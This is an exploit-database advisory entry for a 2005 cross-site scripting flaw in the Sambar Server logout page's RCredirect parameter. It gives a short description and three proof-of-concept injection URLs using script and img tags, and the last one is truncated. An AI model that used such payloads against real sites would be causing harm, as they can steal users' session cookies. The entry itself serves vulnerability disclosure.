Sambar Server 5.x/6.0/6.1 - logout RCredirect Cross-Site Scripting

Author: Jamie Fisher
type: remote
platform: windows
port: 
date_added: 2005-05-24  
date_updated: 2013-05-24  
verified: 1  
codes: OSVDB-16750  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 25695.txt  
source: https://www.securityfocus.com/bid/13722/info

Sambar Server administrative interface does not adequately filter some HTML code thus making it prone to cross-site scripting attacks. It is possible for a remote attacker to create a malicious link containing script code which will be executed in the browser of a legitimate user. All code will be executed within the context of the Web site running Sambar Server.

This issue may be exploited to steal cookie-based authentication credentials from legitimate users of the Web site running the vulnerable software.

1.'>alert('XSS')http://www.example.com/session/logout?RCredirect=>'><script>alert('XSS')</script>
2.">alert("XSS")http://www.example.com/session/logout?RCredirect=>"><script>alert("XSS")</script>
3.%22%27>http://www.example.com/session/logout?RCredirect=>%22%27><img%20src